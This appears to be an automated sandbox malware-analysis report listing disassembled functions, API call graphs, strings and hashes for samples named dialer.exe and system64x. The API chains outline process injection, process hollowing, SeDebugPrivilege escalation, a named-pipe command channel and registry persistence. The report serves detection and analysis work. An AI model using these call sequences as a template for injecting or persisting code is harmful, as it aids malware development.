                                                                          • Instruction Fuzzy Hash: 2441A4B1A08A42C1FE90EB45D8946B8AB61EF84BC4F954132CE0D477A1DFBCE959D320
                                                                          Function 00007FF7624438B0 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 123COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: memsetwcscatwcscpywcslen
                                                                          • String ID: $0$@
                                                                          • API String ID: 468205783-2347541974
                                                                          • Opcode ID: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
                                                                          • Instruction ID: 3d86307f4ad32fa140ff18cf0e92d883eb8a9c8b7f025a3c9baac62d85ba0320
                                                                          • Opcode Fuzzy Hash: 659bee40769b99f3727e1d647f561d414f9a26e08f9d5cb18db75b3f823b1ed2
                                                                          • Instruction Fuzzy Hash: 8661702191C6C1C5FB61AB14E4853ABFBA1EBD4394F940231EA8C43AA5EFBDD549CB10
                                                                          Function 00007FF762442104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                                          • String ID:
                                                                          • API String ID: 3326252324-0
                                                                          • Opcode ID: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction ID: 2028ca60fd8483e9f58fa18b87d19097d0f6fda7e708795c45529ad8b2f4e9ad
                                                                          • Opcode Fuzzy Hash: b536a55527d214355ccdc22c4662103ecafd3a57f3d1ce3f70d4549eef9b577b
                                                                          • Instruction Fuzzy Hash: B121E420A19912C1FE95EB01A990335A662FF44B91F880131CA0D9BAA4DFACFC49C360
                                                                          Function 00007FF762441E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 671 7ff762441e10-7ff762441e2d 672 7ff762441e3e-7ff762441e48 671->672 673 7ff762441e2f-7ff762441e38 671->673 675 7ff762441e4a-7ff762441e53 672->675 676 7ff762441ea3-7ff762441ea8 672->676 673->672 674 7ff762441f60-7ff762441f69 673->674 677 7ff762441ecc-7ff762441ed1 675->677 678 7ff762441e55-7ff762441e60 675->678 676->674 679 7ff762441eae-7ff762441eb3 676->679 680 7ff762441f23-7ff762441f2d 677->680 681 7ff762441ed3-7ff762441ee2 signal 677->681 678->676 682 7ff762441efb-7ff762441f0a call 7ff762448d50 679->682 683 7ff762441eb5-7ff762441eba 679->683 684 7ff762441f2f-7ff762441f3f 680->684 685 7ff762441f43-7ff762441f45 680->685 681->680 686 7ff762441ee4-7ff762441ee8 681->686 682->680 693 7ff762441f0c-7ff762441f10 682->693 683->674 688 7ff762441ec0 683->688 692 7ff762441f5a 684->692 685->674 689 7ff762441eea-7ff762441ef9 signal 686->689 690 7ff762441f4e-7ff762441f53 686->690 688->680 689->674 690->692 692->674 694 7ff762441f12-7ff762441f21 signal 693->694 695 7ff762441f55 693->695 694->674 694->680 695->692
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: CCG
                                                                          • API String ID: 0-1584390748
                                                                          • Opcode ID: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction ID: ef36efc3888ed83aa0e695d9297eec9b5409c828ccf551cf238b814a733b1be1
                                                                          • Opcode Fuzzy Hash: 81cc92ec2fa6e04c40e525b18e1cc1ff4a5f4b230223796d890c278b07bd10c2
                                                                          • Instruction Fuzzy Hash: 3C21B021F0D106C1FEF476149A803799981DF887A4FA48631DE0E433D4DEECAC9BC261
                                                                          Function 00007FF762441880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 696 7ff762441880-7ff76244189c 697 7ff7624418a2-7ff7624418f9 call 7ff762442420 call 7ff762442660 696->697 698 7ff762441a0f-7ff762441a1f 696->698 697->698 703 7ff7624418ff-7ff762441910 697->703 704 7ff76244193e-7ff762441941 703->704 705 7ff762441912-7ff76244191c 703->705 707 7ff76244194d-7ff762441954 704->707 708 7ff762441943-7ff762441947 704->708 706 7ff76244191e-7ff762441929 705->706 705->707 706->707 709 7ff76244192b-7ff76244193a 706->709 711 7ff76244199e-7ff7624419a6 707->711 712 7ff762441956-7ff762441961 707->712 708->707 710 7ff762441a20-7ff762441a26 708->710 709->704 713 7ff762441b87-7ff762441b98 call 7ff762441d40 710->713 714 7ff762441a2c-7ff762441a37 710->714 711->698 715 7ff7624419a8-7ff7624419c1 711->715 716 7ff762441970-7ff76244199c call 7ff762441ba0 712->716 714->711 718 7ff762441a3d-7ff762441a5f 714->718 719 7ff7624419df-7ff7624419e7 715->719 716->711 723 7ff762441a7d-7ff762441a97 718->723 724 7ff7624419e9-7ff762441a0d VirtualProtect 719->724 725 7ff7624419d0-7ff7624419dd 719->725 726 7ff762441a9d-7ff762441afa 723->726 727 7ff762441b74-7ff762441b82 call 7ff762441d40 723->727 724->725 725->698 725->719 733 7ff762441afc-7ff762441b0e 726->733 734 7ff762441b22-7ff762441b26 726->734 727->713 735 7ff762441b5c-7ff762441b6c 733->735 736 7ff762441b10-7ff762441b20 733->736 737 7ff762441b2c-7ff762441b30 734->737 738 7ff762441a70-7ff762441a77 734->738 735->727 739 7ff762441b6f call 7ff762441d40 735->739 736->734 736->735 737->738 740 7ff762441b36-7ff762441b57 call 7ff762441ba0 737->740 738->711 738->723 739->727 740->735
                                                                          APIs
                                                                          • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF762441247), ref: 00007FF7624419F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: ProtectVirtual
                                                                          • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                                          • API String ID: 544645111-395989641
                                                                          • Opcode ID: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction ID: b0d08b4ade2a55959220eb5db7916ea43317a779207f0e41d7460a512851f2c7
                                                                          • Opcode Fuzzy Hash: f55d23e6802c9323605da89ae8314c5a5c300cb13031396fec444b8fb4cb03df
                                                                          • Instruction Fuzzy Hash: 2D518031F08546D6EF90EB25D9407B4AB62FB08B98F848131D92C07795CFBDE899D720
                                                                          Function 00007FF762441800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 744 7ff762441800-7ff762441810 745 7ff762441812-7ff762441822 744->745 746 7ff762441824 744->746 747 7ff76244182b-7ff762441867 call 7ff762442290 fprintf 745->747 746->747
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: fprintf
                                                                          • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                          • API String ID: 383729395-3474627141
                                                                          • Opcode ID: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction ID: cb85885ab14fced4eb582f61079e4c4b77de9d321d6bfeb7acf2f0b49ff02e89
                                                                          • Opcode Fuzzy Hash: 6dc62383441ec21015d1a93eb8b73b3a2626f1b89f937b38c1cf0d1080ec3dd9
                                                                          • Instruction Fuzzy Hash: 10F0C221E08A85C2FA91BB24AA410B9E761EB593C1F80D231DE4D97651DF6CE986C310
                                                                          Function 00007FF76244219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2409798957.00007FF762441000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF762440000, based on PE: true
                                                                          • Associated: 00000003.00000002.2409767536.00007FF762440000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409831307.00007FF762449000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409857534.00007FF76244B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2409888678.00007FF76244C000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410118026.00007FF7626C8000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2410194170.00007FF7626FF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_7ff762440000_system64x.jbxd
                                                                          Similarity
                                                                          • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                                          • String ID:
                                                                          • API String ID: 682475483-0
                                                                          • Opcode ID: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction ID: 5c9012b8a6336e9944131173eca247f94e0f7620e7266c54f288cba5a812e98a
                                                                          • Opcode Fuzzy Hash: d38a7a66502803ee60ea24eddf2a71f1e95afdba96137525794505a2f4712398
                                                                          • Instruction Fuzzy Hash: 06011621A09612C1FEC6EB01AE44234E621FF04B91FC80031CA0D97EA4DFACFD99C320

                                                                          Execution Graph

                                                                          Execution Coverage:46.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:40.1%
                                                                          Total number of Nodes:227
                                                                          Total number of Limit Nodes:24
                                                                          execution_graph 522 140002524 523 140002531 522->523 524 140002539 522->524 525 1400010c0 30 API calls 523->525 525->524 383 140002bf8 384 140002c05 383->384 386 140002c25 ConnectNamedPipe 384->386 387 140002c1a Sleep 384->387 393 140001b54 AllocateAndInitializeSid 384->393 388 140002c83 Sleep 386->388 389 140002c34 ReadFile 386->389 387->384 391 140002c8e DisconnectNamedPipe 388->391 390 140002c57 WriteFile 389->390 389->391 390->391 391->386 394 140001bb1 SetEntriesInAclW 393->394 395 140001c6f 393->395 394->395 396 140001bf5 LocalAlloc 394->396 395->384 396->395 397 140001c09 InitializeSecurityDescriptor 396->397 397->395 398 140001c19 SetSecurityDescriptorDacl 397->398 398->395 399 140001c30 CreateNamedPipeW 398->399 399->395 400 140002258 403 14000226c 400->403 427 140001f2c 403->427 406 140001f2c 14 API calls 407 14000228f GetCurrentProcessId OpenProcess 406->407 408 140002321 FindResourceA 407->408 409 1400022af OpenProcessToken 407->409 412 140002341 SizeofResource 408->412 413 140002261 ExitProcess 408->413 410 1400022c3 LookupPrivilegeValueW 409->410 411 140002318 FindCloseChangeNotification 409->411 410->411 414 1400022da AdjustTokenPrivileges 410->414 411->408 412->413 415 14000235a LoadResource 412->415 414->411 416 140002312 GetLastError 414->416 415->413 417 14000236e LockResource GetCurrentProcessId 415->417 416->411 441 1400017ec GetProcessHeap RtlAllocateHeap 417->441 419 14000238b RegCreateKeyExW 420 140002489 CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 419->420 421 1400023cc ConvertStringSecurityDescriptorToSecurityDescriptorW 419->421 422 14000250f SleepEx 420->422 423 1400023f4 RegSetKeySecurity LocalFree 421->423 424 14000240e RegCreateKeyExW 421->424 422->422 423->424 425 140002448 GetCurrentProcessId RegSetValueExW RegCloseKey 424->425 426 14000247f RegCloseKey 424->426 425->426 426->420 428 140001f35 StrCpyW StrCatW GetModuleHandleW 427->428 429 1400020ff 427->429 428->429 430 140001f86 GetCurrentProcess K32GetModuleInformation 428->430 429->406 431 1400020f6 FreeLibrary 430->431 432 140001fb6 CreateFileW 430->432 431->429 432->431 433 140001feb CreateFileMappingW 432->433 434 140002014 MapViewOfFile 433->434 435 1400020ed CloseHandle 433->435 436 1400020e4 FindCloseChangeNotification 434->436 437 140002037 434->437 435->431 436->435 437->436 438 140002050 lstrcmpi 437->438 440 14000208e 437->440 438->437 439 140002090 VirtualProtect VirtualProtect 438->439 439->436 440->436 447 1400014d8 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 441->447 443 140001885 GetProcessHeap HeapFree 444 140001830 444->443 445 140001851 OpenProcess 444->445 445->444 446 140001867 TerminateProcess CloseHandle 445->446 446->444 448 140001565 447->448 449 14000162f GetProcessHeap RtlDeleteBoundaryDescriptor GetProcessHeap RtlRestoreThreadPreferredUILanguages 447->449 448->449 450 14000157a OpenProcess 448->450 452 14000161a FindCloseChangeNotification 448->452 453 1400015c9 ReadProcessMemory 448->453 449->444 450->448 451 140001597 K32EnumProcessModules 450->451 451->448 451->452 452->448 453->448 454 140002b38 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 455 140002b8e K32EnumProcesses 454->455 456 140002beb Sleep 455->456 458 140002ba3 455->458 456->455 457 140002bdc 457->456 458->457 460 140002540 458->460 461 140002558 460->461 462 14000254d 460->462 461->458 464 1400010c0 462->464 502 1400018ac OpenProcess 464->502 467 1400014ba 467->461 468 140001122 OpenProcess 468->467 469 14000113e OpenProcess 468->469 470 140001161 K32GetModuleFileNameExW 469->470 471 1400011fd NtQueryInformationProcess 469->471 472 1400011aa CloseHandle 470->472 473 14000117a PathFindFileNameW lstrlenW 470->473 474 1400014b1 CloseHandle 471->474 475 140001224 471->475 472->471 477 1400011b8 472->477 473->472 476 140001197 StrCpyW 473->476 474->467 475->474 478 140001230 OpenProcessToken 475->478 476->472 477->471 479 1400011d8 StrCmpIW 477->479 478->474 480 14000124e GetTokenInformation 478->480 479->474 479->477 481 1400012f1 480->481 482 140001276 GetLastError 480->482 483 1400012f8 CloseHandle 481->483 482->481 484 140001281 LocalAlloc 482->484 483->474 489 14000130c 483->489 484->481 485 140001297 GetTokenInformation 484->485 486 1400012df 485->486 487 1400012bf GetSidSubAuthorityCount GetSidSubAuthority 485->487 488 1400012e6 LocalFree 486->488 487->488 488->483 489->474 490 14000139b StrStrA 489->490 491 1400013c3 489->491 490->489 492 1400013c8 490->492 491->474 492->474 493 1400013f3 VirtualAllocEx 492->493 493->474 494 140001420 WriteProcessMemory 493->494 494->474 495 14000143b 494->495 507 14000211c 495->507 497 14000145b 497->474 498 140001478 WaitForSingleObject 497->498 501 140001471 FindCloseChangeNotification 497->501 500 140001487 GetExitCodeThread 498->500 498->501 500->501 501->474 503 14000110e 502->503 504 1400018d8 IsWow64Process 502->504 503->467 503->468 505 1400018f8 FindCloseChangeNotification 504->505 506 1400018ea 504->506 505->503 506->505 510 140001914 GetModuleHandleA 507->510 511 140001934 GetProcAddress 510->511 512 14000193d 510->512 511->512 513 1400021d0 514 1400021dd 513->514 515 140001b54 6 API calls 514->515 516 1400021f2 Sleep 514->516 517 1400021fd ConnectNamedPipe 514->517 515->514 516->514 518 140002241 Sleep 517->518 519 14000220c ReadFile 517->519 520 14000224c DisconnectNamedPipe 518->520 519->520 521 14000222f 519->521 520->517 521->520 526 140002560 527 140002592 526->527 528 14000273a 526->528 529 1400026c6 GetProcessHeap HeapAlloc K32EnumProcesses 527->529 530 140002598 527->530 531 140002748 528->531 532 14000297e ReadFile 528->532 533 140002633 529->533 535 140002704 529->535 536 1400025a5 530->536 537 1400026bd ExitProcess 530->537 538 140002751 531->538 539 140002974 531->539 532->533 534 1400029a8 532->534 534->533 547 1400018ac 3 API calls 534->547 535->533 549 1400010c0 30 API calls 535->549 543 1400025ae 536->543 544 140002660 RegOpenKeyExW 536->544 540 140002919 538->540 541 14000275c 538->541 542 14000175c 22 API calls 539->542 548 140001944 ReadFile 540->548 545 140002761 541->545 546 14000279d 541->546 542->533 543->533 559 1400025cb ReadFile 543->559 550 1400026a1 544->550 551 14000268d RegDeleteValueW 544->551 545->533 608 14000217c 545->608 611 140001944 546->611 552 1400029c7 547->552 554 140002928 548->554 549->535 595 1400019c4 SysAllocString SysAllocString CoInitializeEx 550->595 551->550 552->533 563 1400029db GetProcessHeap HeapAlloc 552->563 564 140002638 552->564 554->533 566 140001944 ReadFile 554->566 558 1400026a6 603 14000175c GetProcessHeap HeapAlloc 558->603 559->533 561 1400025f5 559->561 561->533 573 1400018ac 3 API calls 561->573 569 1400014d8 13 API calls 563->569 575 140002a90 4 API calls 564->575 565 1400027b4 ReadFile 565->533 570 1400027dc 565->570 571 14000293f 566->571 586 140002a14 569->586 570->533 576 1400027e9 GetProcessHeap HeapAlloc ReadFile 570->576 571->533 577 140002947 ShellExecuteW 571->577 579 140002614 573->579 575->533 581 14000290b GetProcessHeap 576->581 582 14000282d 576->582 577->533 579->533 579->564 585 140002624 579->585 580 140002a49 GetProcessHeap 583 140002a52 HeapFree 580->583 581->583 582->581 587 140002881 lstrlenW GetProcessHeap HeapAlloc 582->587 588 14000285e 582->588 583->533 589 1400010c0 30 API calls 585->589 586->580 635 1400016cc 586->635 629 140002a90 CreateFileW 587->629 588->581 615 140001c88 588->615 589->533 596 140001a11 CoInitializeSecurity 595->596 597 140001b2c SysFreeString SysFreeString 595->597 598 140001a59 CoCreateInstance 596->598 599 140001a4d 596->599 597->558 600 140001b26 CoUninitialize 598->600 601 140001a88 VariantInit 598->601 599->598 599->600 600->597 602 140001ade 601->602 602->600 604 1400014d8 13 API calls 603->604 606 14000179a 604->606 605 1400017c8 GetProcessHeap HeapFree 606->605 607 1400016cc 5 API calls 606->607 607->606 609 140001914 2 API calls 608->609 610 140002191 609->610 612 140001968 ReadFile 611->612 613 14000198b 612->613 614 1400019a5 612->614 613->612 613->614 614->533 614->565 616 140001cbb 615->616 617 140001cce CreateProcessW 616->617 619 140001e97 616->619 621 140001e62 OpenProcess 616->621 623 140001dd2 VirtualAlloc 616->623 625 140001d8c WriteProcessMemory 616->625 617->616 618 140001d2b VirtualAllocEx 617->618 618->616 620 140001d60 WriteProcessMemory 618->620 619->581 620->616 621->616 622 140001e78 TerminateProcess 621->622 622->616 623->616 624 140001df1 GetThreadContext 623->624 624->616 626 140001e09 WriteProcessMemory 624->626 625->616 626->616 627 140001e30 SetThreadContext 626->627 627->616 628 140001e4e ResumeThread 627->628 628->616 628->619 630 1400028f7 GetProcessHeap HeapFree 629->630 631 140002ada WriteFile 629->631 630->581 632 140002b1c CloseHandle 631->632 633 140002afe 631->633 632->630 633->632 634 140002b02 WriteFile 633->634 634->632 636 140001745 635->636 637 1400016eb OpenProcess 635->637 636->580 637->636 638 140001703 637->638 639 14000211c 2 API calls 638->639 640 140001723 639->640 641 14000173c CloseHandle 640->641 642 140001731 CloseHandle 640->642 641->636 642->641

                                                                          Callgraph

                                                                          Executed Functions

                                                                          Function 000000014000226C Relevance: 61.4, APIs: 27, Strings: 8, Instructions: 165registrymemorythreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess$Close$CurrentResource$FileFindSecurityThread$ChangeDescriptorFreeHandleHeapModuleNotificationOpenProtectTokenValueVirtual$AdjustAllocConvertErrorInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                          • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                          • API String ID: 1970497257-1130149537
                                                                          • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                          • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                          • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740
                                                                          Function 00000001400010C0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 257memorystringnativeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 24 1400010c0-140001110 call 1400018ac 27 140001116-14000111c 24->27 28 1400014ba-1400014d6 24->28 27->28 29 140001122-140001138 OpenProcess 27->29 29->28 30 14000113e-14000115b OpenProcess 29->30 31 140001161-140001178 K32GetModuleFileNameExW 30->31 32 1400011fd-14000121e NtQueryInformationProcess 30->32 33 1400011aa-1400011b6 CloseHandle 31->33 34 14000117a-140001195 PathFindFileNameW lstrlenW 31->34 35 1400014b1-1400014b4 CloseHandle 32->35 36 140001224-14000122a 32->36 33->32 38 1400011b8-1400011d3 33->38 34->33 37 140001197-1400011a7 StrCpyW 34->37 35->28 36->35 39 140001230-140001248 OpenProcessToken 36->39 37->33 40 1400011d8-1400011ea StrCmpIW 38->40 39->35 41 14000124e-140001274 GetTokenInformation 39->41 40->35 42 1400011f0-1400011fb 40->42 43 1400012f1 41->43 44 140001276-14000127f GetLastError 41->44 42->32 42->40 45 1400012f8-140001306 CloseHandle 43->45 44->43 46 140001281-140001295 LocalAlloc 44->46 45->35 47 14000130c-140001313 45->47 46->43 48 140001297-1400012bd GetTokenInformation 46->48 47->35 51 140001319-140001324 47->51 49 1400012df 48->49 50 1400012bf-1400012dd GetSidSubAuthorityCount GetSidSubAuthority 48->50 52 1400012e6-1400012ef LocalFree 49->52 50->52 51->35 53 14000132a-140001334 51->53 52->45 53->35 54 14000133a-140001344 53->54 54->35 55 14000134a-14000138a call 140001ec4 * 3 54->55 55->35 62 140001390-1400013b0 call 140001ec4 StrStrA 55->62 65 1400013b2-1400013c1 62->65 66 1400013c8-1400013ed call 140001ec4 * 2 62->66 65->62 67 1400013c3 65->67 66->35 72 1400013f3-14000141a VirtualAllocEx 66->72 67->35 72->35 73 140001420-140001439 WriteProcessMemory 72->73 73->35 74 14000143b-14000145d call 14000211c 73->74 74->35 77 14000145f-140001467 74->77 77->35 78 140001469-14000146f 77->78 79 140001471-140001476 78->79 80 140001478-140001485 WaitForSingleObject 78->80 81 1400014ab FindCloseChangeNotification 79->81 82 1400014a6 80->82 83 140001487-14000149b GetExitCodeThread 80->83 81->35 82->81 83->82 84 14000149d-1400014a3 83->84 84->82
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                          • Associated: 00000011.00000002.2486319584.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486685714.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000011.00000002.2486771111.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_140000000_dialer.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Close$Open$FindHandleInformationToken$AllocAuthorityChangeFileLocalNameNotification$CodeCountErrorExitFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                          • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                          • API String ID: 2998269048-3753927220
                                                                          • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                          • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                          • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740
                                                                          Function 00000001400014D8 Relevance: 19.6, APIs: 13, Instructions: 130memorythreadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2486526895.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
